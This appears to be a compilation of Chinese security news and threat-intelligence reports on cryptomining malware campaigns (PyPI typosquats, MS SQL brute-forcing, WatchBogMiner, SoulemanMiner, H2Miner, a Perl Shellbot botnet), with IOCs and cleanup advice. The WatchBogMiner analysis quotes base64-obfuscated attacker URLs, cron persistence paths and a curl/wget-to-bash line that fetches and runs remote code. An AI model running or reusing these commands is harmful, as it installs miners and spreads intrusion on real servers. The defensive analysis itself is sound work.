专注于软件供应链安全管理的研究公司 Sonatype，刚刚在官方的 Python 软件存储库（PyPI）上发现了六个包含不同恶意软件的 Python 包。这些恶意内容被藏于 setup.py 的安装说明文件中，继而导致加密货币挖矿类恶意软件被下载并安装到受害者的系统上。 Nexus 防火墙组件的分析过程（图自：Sonatype） 过去数月，这几款恶意软件包被下载量将近 5000 次，且发布者使用了 nedog123 的用户名。 learninglib 中包含的 maratlib 依赖项 以下是对应的六款恶意软件的名称与下载数： ● maratlib：2371 ● maratlib1：379 ● matplatlib-plus：913 ● mllearnlib：305 ● mplatlib：318 ● learninglib：626   LKEK 也指向了 maratlib 依赖项 其中一些明显利用了错误的单词拼接方法，并且故意碰瓷 PyPI 上热门的机器学习包文件（比如用李鬼 mplatlib 来假冒官方的 matplotlib）。 maratlib 代码中包含了严重的混淆 尽管此类攻击似乎只是为了窃取部分系统资源，但供应链安全攻击还是让 Sonatype 感到十分紧张。 0.6 代码中高亮显示的 GitHub 网址 即便代码被严重加花、并从 GitHub 上调用了其它包，但 Sonatype 还是详细解释了他们是如何检测到加密货币挖矿类恶意软件的。 aza2.sh 中的 Bash 脚本，也被发现了某些版本的 maratlib 。 最后，Sonatype 指出，此类恶意软件不大可能影响大多数运行高级反病毒防护软件的普通用户，而是更加针对那些拥有高性能 Linux 机器的机器学习研究人员们。   （消息及封面来源：cnBeta）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/znFP8IjcC3KIuPfsm_93oA     一、概述 腾讯安全威胁情报中心检测到针对MS SQL服务器攻击的挖矿木马，该挖矿木马主要针对MS SQL服务进行爆破弱口令攻击，爆破成功后会植入门罗币挖矿木马进行挖矿。同时攻击者下载frpc内网穿透工具安装后门，并会添加用户以方便入侵者远程登录该服务器。 从挖矿木马的HFS服务器计数看，已有上万台MS SQL服务器被植入挖矿木马，另有数十台服务器被安装后门。攻击者在失陷服务器上安装内网穿透工具会进一步增加黑客入侵风险，企业数据库服务器沦陷会导致严重信息泄露事件发生。 腾讯安全专家建议企业在所有服务器上避免使用弱口令，爆破攻击通常是黑客试水的第一步，使用弱口令非常容易导致企业资产被入侵。腾讯T-Sec终端安全管理系统（御点）已可拦截查杀该挖矿木马。 腾讯安全旗下安全产品已针对该挖矿木马的入侵行为进行检测和拦截，具体响应清单如下： 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）该木马相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1） 腾讯云镜支持Mssql弱密码检测； 2）腾讯云镜支持查杀该挖矿木马。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 （Cloud Workload Protection，CWP） 1）腾讯漏洞扫描服务已支持监测全网资产是否受MSSQL弱密码影响。 关于腾讯T-Sec网络资产风险监测系统的更多信息，可参考：https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯漏洞扫描服务等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）对利用mssql爆破入侵的相关协议特征进行识别检测； 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统（御点） 1）查杀该团伙入侵释放的挖矿程序，内网端口映射工具； 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html 二、样本分析 该黑产团伙对mssql服务器进行爆破成功后，会下载执行HFS服务器上的恶意文件，从下载量来看，受感染的服务器有数万台，被植入后门的服务器有数十台，挖矿木马HFS文件列表如下： Adduser.exe，添加后门账户，用于后续远程登陆。 SQL.exe执行后释放4个文件到c:\windows\Fonts目录中 c:\windows\Fonts\Csrss.exe是NSSM服务封装程序，用于将sqlwriters.exe注册为服务，服务名为SQLServer Sqlwrites.exe是基于xmrig 6.2的挖矿程序 矿池： xmr.hex7e4.ru:3333 d2pool.ddns.net:3333 xmr.hex7e4.ru:3333 d2pool.ddns.net:3333 Frp_C.exe执行后释放以下文件到c:\windows\Fonts中 Dllhost.exe是一款开源的内网穿透工具Frpc，Bat负责生成frpc配置文件，以及设置服务启动项，目的是将本机的3389端口暴露给黑客服务器frp.hex7e4.ru，黑客可直接通过RDP连接到受害服务器，进而控制企业内网。 IOCs Doamin xxx.hex7e4.ru xmr.hex7e4.ru d3d.hex7e4.ru IP 43.229.149.62 185.212.128.180 URLs hxxp://43.229.149.62:8080/web/Add.exe hxxp://43.229.149.62:8080/web/AddUser.exe hxxp://43.229.149.62:8080/web/dw.exe hxxp://43.229.149.62:8080/web/Frp_C.exe hxxp://43.229.149.62:8080/web/frpc.exe hxxp://43.229.149.62:8080/web/frpc.ini hxxp://43.229.149.62:8080/web/po.jpg hxxp://43.229.149.62:8080/web/se.jpg hxxp://43.229.149.62:8080/web/SQL.exe hxxp://43.229.149.62:8080/web/sqlwriters.jpg hxxp://43.229.149.62:8080/web/sqlwriters1.jpg hxxp://43.229.149.62:8080/web/xx.txt hxxp://43.229.149.62:8080/web/xxx.txt MD5 9a745dc59585a5ad76fee0867acd1427 statr.bat 301257a23e2cad9da915cd942c833146 sqlwriters.exe 9a22fe62ebad16edc5c489c9493a5882 Frp_C.exe 88527fecde10ca426680d5baf6b384d1 po.jpg e27ba54c177c891ad3077de230813373 xxx.txt 2176ecfe4d91964ffec346dd1527420d xx.txt f457a5f0472e309c574795ca339ab566 sql.exe

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/5bt4XtP2NNFssl7QbF2S0Q   一、背景 腾讯安全威胁情报中心检测到针对Linux服务器进行攻击的WatchBogMiner变种挖矿木马。该木马利用Nexus Repository Manager、Supervisord、ThinkPHP等服务器组件的远程代码执行漏洞进行攻击，在失陷机器安装多种类型的持久化攻击代码，然后植入门罗币挖矿木马进行挖矿，腾讯安全专家根据木马使用的算力资源推测已有上万台Linux服务器被黑客控制。 木马通过第三方网站Pastebin保存恶意代码以躲避检测，并且通过各类方法进行持久化，定期拉取挖矿木马加载到内存执行，同时会在启动后删除木马文件以达到“隐身”目的。和其他挖矿木马类似，WatchBogMiner木马挖矿时，会清除其他挖矿木马以独占服务器。 WatchBogMiner变种攻击代码还会通过失陷机器已认证过的SSH RSA进行SSH连接和执行远程命令进行横向移动，以扩大其影响范围。根据其钱包算力（120Kh/s）推测，木马已控制约1万台服务器进行挖矿。 腾讯安全专家建议企业网管对Linux服务器进行安全检测，及时清除挖矿木马，及时修复服务器组件存在的高危漏洞，避免遭遇更严重的损失，检测方案可参考腾讯安全系列产品应对WatchBogMiner挖矿木马的响应清单进行： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）WatchBogMiner黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）WatchBogMiner黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）WatchBogMiner关联的IOCs已支持识别检测； 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀WatchBogMiner相关木马程序； 2）已支持Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)检测 ； 3）已支持Supervisord远程命令执行漏洞(CVE-2017-11610)检测； 4）已支持ThinkPHP远程命令执行漏洞检测。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 （Vulnerability Scan Service，VSS） 1）腾讯VSS已支持检测全网资产是否存在Nexus Repository Manager、Supervisord、ThinkPHP等服务器组件高危漏洞； 关于腾讯T-Sec漏洞扫描服务的更多信息，可参考：https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）通过协议检测WatchBogMiner木马与服务器的网络通信； 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统（御点） 1）可查杀WatchBogMiner团伙入侵释放的木马程序； 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html 更多产品信息，请参考腾讯安全官方网站https://s.tencent.com/ 二、样本分析 WatchBogMiner使用Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)、Supervisord远程命令执行漏洞(CVE-2017-11610)、ThinkPHP远程命令执行漏洞的EXP代码对服务器进行扫描和攻击，并通过Payload执行https[:]//pastebin.com/raw/1eDKHr4r。失陷机器被安装的恶意定时任务如下： 为逃避检测，攻击者使用第三方网站Pastebin来保存恶意代码，该网站不会被网络防御方判断为恶意网站。WatchBogMiner变种用于存放恶意代码的Pastebin账号为”LISTTIME”，创建于2020年4月20日。 https[:]//pastebin.com/raw/1eDKHr4r跳转https[:]//pastebin.com/raw/UhUmR517 “UhUmR517”上保存的内容经过base64解码后，会得到以下shell脚本，包括有system()、cronhigh()、gettarfile()、download()、testa()、kill_miner_proc()等函数，会完成持久化、挖矿、横向移动等功能，是该病毒的主要攻击脚本。 脚本首先定义了4个变量，内容分别如下： house=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzFlREtIcjRy|base64 -d) park=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2I1eDFwUnpL|base64 -d) beam=$(echo c2FkYW42NjYueHl6OjkwODAvcnI=|base64 -d) deep=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1NqaldldlRz|base64 -d) surf=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3R5am5UUVRB|base64 -d) 经过base64解码后： house= https[:]//pastebin.com/raw/1eDKHr4r park= https[:]//pastebin.com/raw/b5x1pRzK beam= sadan666.xyz:9080/rr deep= https[:]//pastebin.com/raw/SjjWevTs surf= https[:]//pastebin.com/raw/tyjnTQTA 其中house、park、beam都会跳转得到“UhUmR517”脚本，而deep、surf会返回函数名“dragon”和“lossl”。 持久化模块通过多种方式定期执行远程shell脚本：1.system()函数通过写入/etc/crontab文件，创建定时任务。 2.cronhigh()通过写入以下文件创建定时任务。 /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/system /etc/cron.d/apache /etc/cron.d/root /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane 3.cronlow()通过crontab命令创建定时任务。 4.cronbackup()通过at命令：echo “$pay” | at -m now + 1 minute添加定时任务，通过后台隐藏执行一段带有while循环的脚本：”while true; do sleep 600 && $pay; done”，同样达到定时任务效果。 5.cronc()通过写入环境变量文件”/home/$me/.bashrc”、”/root/.bashrc”执行定时任务。 挖矿模块为download()和testa()，分别从https[:]//pastebin.com/raw/GMdeWqec、 https[:]//pastebin.com/raw/Esctfgrx下载$mi_64和$st_64，经过解码后得到XMRig、xmr-stak修改而成的挖矿程序，保存为： /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/javaUpDates（最初被发现时该文件名为watchbog） 然后从https[:]//pastebin.com/raw/SB0TYBvG下载得到挖矿配置文件。 矿池：pool.minexmr.com:80 钱包： 48S8kPXdSgubJYsMhpRTr4Ct1nznDzV9ohNMEbmKzgeJLwWPV2QfKzsNRDYoxWWMAdTW69EVBhRQuFr7BiCsMQoU9xAKW4U 对比新版和旧版的挖矿木马启动代码，发现新版代码在释放和启动挖矿木马之后，会sleep 15秒，然后通过rm -rf 命令将挖矿木马文件删除。 由于Linux系统进程启动时，会将文件完全映射到内存中，所以启动之后删除文件不影响已经在运行中的进程，木马用这一方法来抹掉文件痕迹从而达到隐身。木马已通过各类持久化任务定期拉取挖矿木马并加载到内存执行，即使每次执行后删除文件，也能达到挖矿进程长期驻留系统的效果。 该钱包目前挖矿获得门罗币28XMR，折合人民币13600元，矿池算力维持在120kH/s左右，这意味着持续有1万台左右的服务器被控制挖矿。 脚本还会通过Kill_miner_proc()找到并清除竞品挖矿木马。 通过Kill_sus_proc()杀死高占用CPU的可疑进程。 变种新增横向移动模块，获取/root/.ssh/known_hosts中保存的已通过SSH RSA公钥认证的IP，重新进行SSH登陆并执行远程命令进行内网扩散攻击： curl -fsSL https[:]//pastebin.com/raw/UhUmR517||wget -q -O – https[:]//pastebin.com/raw/UhUmR517)|base64 -d|bash >/dev/null 2>&1 & 三、手动清除建议： 1、 检查是否有高CPU占用的进程javaUpDates，kill掉该进程： 映像文件路径（可能已被删除）：/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/javaUpDates 2、检查以下文件是否有包含“sadan666.xyz:9080/rr”的定时任务，如有将其删除： /etc/crontab /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/system /etc/cron.d/apache /etc/cron.d/root /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane 同时通过crontab命令检查有无“sadan666.xyz:9080/rr”相关定时任务，如有将其删除。 3、通过atq命令查找at任务队列，删除“sadan666.xyz:9080/rr”相关作业。 4、检查是否存在进程/tmp/crun，如果该进程每10分钟请求一次 “sadan666.xyz:9080/rr”，Kill掉该进程。 5、检查配置文件”/home/$me/.bashrc”、”/root/.bashrc”是否包含“sadan666.xyz:9080/rr”相关内容，如有将其删除。 IOCs Domain sadan666.xyz IP 104.236.66.189 URL https[:]//pastebin.com/raw/1eDKHr4r https[:]//pastebin.com/raw/UhUmR517 https[:]//pastebin.com/raw/b5x1pRzK http[:]//sadan666.xyz:9080/rr https[:]//pastebin.com/raw/SjjWevTs https[:]//pastebin.com/raw/tyjnTQTA https[:]//pastebin.com/raw/Esctfgrx https[:]//pastebin.com/raw/GMdeWqec https[:]//pastebin.com/raw/SB0TYBvG https[:]//pastebin.com/raw/Zkz0d9Jz https[:]//pastebin.com/raw/mvSEGmR6 md5 mi_64 88b658853b9ececc48f5cac2b7b3f6f6 st_64 ad17226de6cc93977fb7c22c7a27ea8e 钱包： 48S8kPXdSgubJYsMhpRTr4Ct1nznDzV9ohNMEbmKzgeJLwWPV2QfKzsNRDYoxWWMAdTW69EVBhRQuFr7BiCsMQoU9xAKW4U

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/6mTvjKUesPS0MrpoIW5_5Q 一、概述 腾讯安全威胁情报中心发现利用永恒之蓝漏洞攻击传播的挖矿木马SoulemanMiner。该挖矿木马在2020年1月开始出现，攻击时利用永恒之蓝漏洞在内网攻击传播，攻击成功后会继续下载由XMRig编译的门罗币挖矿程序。SoulemanMiner挖矿木马运行时，会结束其他挖矿木马进程以独占资源。 对SoulemanMiner使用的下载服务器上的样本进行分析，还发现了在攻击时传播的窃密木马AZORult和盗取数字货币的木马Bitcoin-Grabber。AZORult会从浏览器、邮件和各类客户端软件中获取登录密码并上传至远程服务器，Bitcoin-Grabber或将剪切板中的比特币、以太坊币、莱特币、门罗币等多个类型的数字钱包地址进行替换，企图在用户进行交易时盗取相应的数字货币。 通过公开的钱包地址查询交易历史记录，发现SoulemanMiner挖矿木马团伙已通过挖矿和剪切板劫持数字交易获利超过27万元人民币。 二、安全建议与解决方案 腾讯安全专家建议企业用户尽快修复永恒之蓝相关安全漏洞，避免挖矿木马利用漏洞在局域网内扩散；网管可以关闭内网暂时非必要的端口（如135、139、445、3389等），减少网络攻击面；使用腾讯T-Sec终端安全管理系统及腾讯电脑管家均已支持对SoulemanMiner的查杀。企业用户还可使用腾讯安全系列产品对网络流量进行检测，及时发现内网挖矿行为。 三、样本分析 SoulemanMiner在失陷机器解压new3.exe释放 “双脉冲星”、“永恒之蓝”漏洞攻击工具，以及1×64.dll、1×86.dll、2×64.dll、2×86.dll、3×64.dll、3×86.dll共6个Payload文件。 攻击包安装完成后，启动rundll.exe开始攻击。该文件采用Pyinstaller打包生成，我们利用开源工具pyinstxtractor.py解压文件，然后利用Easy Python Decompiler对解压出的pyc文件进行反编译得到rundll.py。 rundll.py获取本机IP地址。 针对本机IP的同A、B网段（遍历C、D网段）地址进行445端口扫描，保存结果至Result.txt。 使用“双脉冲星”、“永恒之蓝”漏洞攻击工具进行攻击。 漏洞攻击成功后，针对三组不同的IP地址，植入不同的Payload文件。 1.挖矿 Payload在目标系统执行后，分别下载x.rar、y.rar、z.rar，保存至c:\programdata\lsass4.exe 并运行。下载地址如下： http[:]//178.32.53.209/x.rar http[:]//178.32.53.209/y.rar http[:]//178.32.53.209/z.rar x.rar、y.rar、z.rar是利用NSIS生成的可执行文件，通过解压可以看到 Parameters.ini里面是配置信息： Processlist.txt是检测运行环境是否存在监控进程： taskmgr.exe ProcessHacker.exe perfmon.exe procexp.exe procexp64.exe procexp32.exe resmon.exe autoruns.exe procmon.exe aida64.exe rpexplorer.exe anvir.exe AutoCloseExe.txt是需要杀死的竞品挖矿进程名单，包括WannaMiner等： C:\Windows\System32\SearchIndexer.exe C:\Windows\System32\WUDFHost.exe C:\Windows\Fonts\runhost.exe C:\Windows\debug\winlogond.exe C:\Windows\System32\dllhost.exe C:\Windows\System32\msdtc.exe C:\Windows\System32\ctfmon.exe C:\Windows\System32\TrustedHostex.exe C:\Windows\System32\SearchProtocolHost.exe C:\Windows\System32\wuauclt.exe C:\Windows\YZebx\Xs.exe C:\Windows\odeZP\dW.exe C:\Windows\dwVSF\TW.exe C:\Windows\AppDiagnostics\wininit.exe C:\Windows\AppDiagnostics\svchost.exe C:\Windows\SysWOW64\InstallShield\setup.exe C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe C:\Windows\Fonts\Mysql\svchost.exe C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe C:\Windows\svchost.exe C:\Windows\SysWOW64\svchost.exe C:\Windows\Fonts\Mysql\puls.exe C:\Windows\System32\WUDFHostex.exe C:\Program Files\Microsoft Security Client\MpCmdRun.exe C:\Windows\Fonts\d1lhots.exe C:\Windows\kkOqZ\wM.exe C:\Windows\SysWOW64\Application.exe C:\Windows\XIPNL\EM.exe C:\Windows\MicrosoftUpdateLink.exe C:\Windows\System32\dllhostex.exe 从NSIS脚本中可以看到，样本执行后会释放conhost.exe等文件到C:\Windows\System32\drivers\目录下，然后将conhost.exe安装为服务“WinsockSvc”启动。 conhost.exe会检测是否存在Processlist.txt的监控进程，杀死AutoCloseExe.txt中的竞品挖矿进程，然后从Parameters.ini配置的服务器地址下载挖矿木马http[:]//178.32.53.209/xm64.zip。 下载得到由开源挖矿程序XMRig编译而成的挖矿木马。 2.窃密 分析发现，SoulemanMiner使用的服务器185.228.83.153还传播除挖矿外的其他木马http[:]//185.228.83.153/st.exe，st.exe通过自解压释放自身到全局启动目录C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\。 st.exe是采用Delphi编写的窃密木马AZORult，运行后会窃取以下信息加密后发送至C2服务器：http[:]//soulemanivsusa.xyz/32/index.php 窃取保存在浏览器中的各类密码； 窃取数字加密货币钱包； 窃取浏览器历史记录； 盗取网站cookie； 窃取电子邮件登陆账号密码； 窃取Telegram、Steam密码； Skype密码和聊天记录； 获取中招机器屏幕截图； 执行自定义命令 3.盗取数字货币 通过服务器下载的另一样本http[:]//185.228.83.153/777.exe，自解压得到svhosts.exe，同样安装到全局启动目录下。svhosts.exe是采样C#编写的数字货币盗取程序（也称剪切板劫持木马）Bitcoin-Grabber。 Bitcoin-Grabber实时监测获取电脑剪切板内容，通过正则匹配发现其中的数字加密货币地址，并将匹配到的不同类型钱包地址替换成木马的钱包地址，以便在用户进行转账时盗取数字货币。 盗取数字货币用的钱包地址如下： 通过公开的矿池、交易历史可查到的信息，该木马的部分钱包通过盗取和挖矿已获利超过27万元人民币。 IOCs IP 116.203.240.6 178.32.53.209 185.228.83.153 Domain klicoverof.world handler1.soulemanifight.club 3.soulemanifight.club 2.soulemanifight.club 1.soulemanifight.club 1.blackhohol.online 2.blackhohol.online km1.maxvarlamoff.club km2.maxvarlamoff.club km1.koronavirusfuck.xyz km2.koronavirusfuck.xyz km2.dancingblack.online 1.novichok.xyz 2.novichok.xy 1.soulemanivsusa.xyz 2.soulemanivsusa.xyz soulemanivsusa.xyz Md5 2662452d7f77c434b185040575c87932 fdae88d3a3e21ab29f0e4390f960543c fb59c96176c1453cd2a05eadb8368026 a8f757a0a871b2aaca3535f16f0c8b66 b9ae13778f36534ddfeccf7329f4f62e 04d04cbd71f45ad36a03fd9a3a761055 1ed7e0fdd1e072cb92b8115579aac391 8c50dabe5dd305d1f6d28f5164075ff7 0f38c4b35c4f830ba14d9237bf82af56 6fa76c8b29b4da063766d2e6df001ed6 04ac52778d6871d24a5dc957a41d84fd 4cf0ff9887c3e7de5d4c0ed9674d2903 67a7c1c24de0026b9d367fc5f0048a0e 6fa76c8b29b4da063766d2e6df001ed6 8ab5c496b795f12526e7ae0bf26365fb URL http[:]//178.32.53.209/x.rar http[:]//178.32.53.209/y.rar http[:]//178.32.53.209/z.rar http[:]//185.228.83.153/new3.exe http[:]//3.soulemanifight.club/z.rar http[:]//185.228.83.153/xm32.zip http[:]//178.32.53.209/777.exe http[:]//185.228.83.153/777.exe C2 http[:]//soulemanivsusa.xyz/32/index.php

Unit 42研究人员发现了一个新的使用Perl Shellbot的僵尸网络活动，旨在挖掘比特币，同时使用专门制作的rootkit以避免检测。 该僵尸网络传播的方式是将一个恶意的shell脚本发送到一个受攻击的设备，然后该设备下载其他脚本。在受害者设备执行下载的脚本之后，它开始等待来自其命令和控制(C2)服务器的命令。尽管Perl编程语言因其广泛的兼容性而在恶意软件中流行，但这种僵尸网络不仅可能影响基于unix的系统，还可能影响使用Linux子系统的Windows 10系统。 本次发现的新活动使用了一个名为libprocesshider.so的共享库来隐藏挖掘过程，并且用一个专门制作的rootkit来避免检测。该恶意活动幕后者使用“Los Zetas”这个名字，暗指一个墨西哥犯罪组织，该组织被认为是该国最危险的贩毒集团之一。尽管如此，他们实际上不太可能是这个犯罪组织的一部分。此外，这个僵尸网络还连接到最大的IRC(Internet中继聊天)网络之一的UnderNet，讨论了包括恶意软件和网络犯罪在内的各种主题。 而且，僵尸网络在被发现时仍在开发中。但是，重要的是在攻击者危害更多设备之前阻止它。我们观察到，僵尸网络越来越多地使用xmrig和emech等已知的挖掘工具，在受害设备上挖掘比特币。这些工具已经在最近的挖矿活动中被检测到，例如VictoryGate和Monero mining开采了超过6000美元的利润。我们估计，如果Eleethub僵尸网络在一到两年的时间内扩张，它也可以赚取数千美元。   …… 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1214/     消息来源：PaloAltoNetworks， 译者：吴烦恼。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/eLnQxa_hXxhNhyquOThW7Q 一、概述 腾讯安全威胁情报中心于2020年05月03日检测到H2Miner木马利用SaltStack远程命令执行漏洞（CVE-2020-11651、CVE-2020-11652）入侵企业主机进行挖矿。通过对木马的核心脚本以及可执行文件的对比分析，我们确认了此次攻击行动属于挖矿木马家族H2Miner。 H2Miner是一个linux下的挖矿僵尸网络，通过hadoop yarn未授权、docker未授权、confluence RCE、thinkphp 5 RCE、Redis未授权等多种手段进行入侵，下载恶意脚本及恶意程序进行挖矿牟利，横向扫描扩大攻击面并维持C&C通信。 腾讯安全威胁情报中心大数据统计结果显示，H2Miner利用SaltStack漏洞的攻击自5月3日开始，目前呈快速增长趋势。H2Miner挖矿木马运行时会尝试卸载服务器的安全软件，清除服务器安装的其他挖矿木马，以独占服务器资源。目前，H2Miner黑产团伙通过控制服务器进行门罗币挖矿已非法获利超370万元。 二、样本分析 Saltstack是基于python开发的一套C/S自动化运维工具。近日，SaltStack被爆存在认证绕过漏洞（CVE-2020-11651）和目录遍历漏洞（CVE-2020-11652），其中： CVE-2020-11651：为认证绕过漏洞，攻击者可构造恶意请求，绕过Salt Master的验证逻辑，调用相关未授权函数功能，达到远程命令执行目的。 CVE-2020-11652：为目录遍历漏洞，攻击者可构造恶意请求，读取服务器上任意文件，获取系统敏感信息信息。 漏洞影响版本 SaltStack < 2019.2.4 SaltStack < 3000.2 安全研究人员在得到企业授权后，对中招机器进行排查，在/var/log/salt/minion日志中发现攻击时的恶意文件下载行为： 该下载行为正是利用SaltStack漏洞攻击成功后执行的远程命令，命令通过curl或wget下载和执行脚本sa.sh（http[:]//217.12.210.192/sa.sh），脚本sa.sh具有以下功能： 1、卸载防御软件阿里云骑士、腾讯云镜。 2、通过端口、文件名、进程名、钱包地址匹配匹配找到竞品挖矿木马，删除对应的进程和文件，杀死正在运行的竞争对手的Docker容器并删除其镜像。 3、检查文件/tmp/salt-store是否存在，md5是否为“8ec3385e20d6d9a88bc95831783beaeb”。 4、salt-store不存在或md5不正确则下载该文件至tmp目录下。 下载得到的salt-store采用Golang编写，被编译为Linux平台可执行程序，主要有以下功能： 下载文件并执行 启动和维持挖矿程序 与C&C服务器通信，接收并执行远程命令 利用masscan对外扫描 针对redis服务进行爆破攻击 salt-store从http[:]//206.189.92.32/tmp/v下载XMRig挖矿木马，保存为/tmp/salt-minions，然后启动连接矿池xmr-eu1.nanopool.org挖矿，配置中使用门罗币钱包为： 46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb 目前该钱包已挖矿获得8236个门罗币，获利折合人民币超过370万元。该黑产团伙的战果显示：入侵控制Linux服务器挖矿已是黑产生财之道，采用Linux服务器的企业万不可掉以轻心。 三、关联家族分析 此次攻击中sa.sh（e600632da9a710bba3c53c1dfdd7bac1）与h2miner使用的 ex.sh（a626c7274f51c55fdff1f398bb10bad5）脚本内容呈现高度相似： 上述标记中sa.sh对比ex.sh唯一缺少的代码是通过crontab定时任务设置持久化。 而sa.sh和ex.sh主要的任务为下载木马salt-store（8ec3385e20d6d9a88bc95831783beaeb）和kinsing（a71ad3167f9402d8c5388910862b16ae），这两个木马都时采样Golang语言编写，并编译为Linux平台可执行程序，两个样本代码结构高度相似、并且完成的功能几乎相同，因此我们认为两者属于同一家族。 四、安全建议 腾讯安全专家建议企业采取以下措施强化服务器安全，检查并清除服务器是否被入侵安装H2Miner挖矿木马。 1.将Salt Master默认监听端口（默认4505 和 4506）设置为禁止对公网开放，或仅对可信对象开放。将SaltStack升级至安全版本以上，升级前建议做好快照备份，设置SaltStack为自动更新，及时获取相应补丁。 2.Redis 非必要情况不要暴露在公网，使用足够强壮的Redis口令。 3.参考以下步骤手动检查并清除H2Miner挖矿木马： kill掉进程中包含salt-minions和salt-store文件的进程，文件hash为a28ded80d7ab5c69d6ccde4602eef861、8ec3385e20d6d9a88bc95831783beaeb； 删除文件/tmp/salt-minions、/tmp/salt-store； 将恶意脚本服务器地址217.12.210.192、206.189.92.32进行封禁； 升级SaltStack到2019.2.4或3000.2，防止病毒再次入侵。 IOCs MD5 e600632da9a710bba3c53c1dfdd7bac1 a28ded80d7ab5c69d6ccde4602eef861 8ec3385e20d6d9a88bc95831783beaeb a626c7274f51c55fdff1f398bb10bad5 a71ad3167f9402d8c5388910862b16ae IP 217.12.210.192 206.189.92.32 144.217.117.146 URL hxxps[:]//bitbucket.org/samk12dd/git/raw/master/salt-store hxxp[:]//217.12.210.192/salt-store hxxp[:]//217.12.210.192/sa.sh hxxp[:]//206.189.92.32/tmp/v hxxp[:]//206.189.92.32/tmp/salt-store hxxp[:]//144.217.117.146/ex.sh hxxp[:]//144.217.117.146/kinsing2 参考链接 通告：针对SaltStack远程命令执行漏洞（CVE-2020-11651、CVE-2020-11652）植入挖矿木马的应急响应 https://mp.weixin.qq.com/s/CtZbXD0CXCemWyAwWhiv2A https://developer.aliyun.com/article/741844

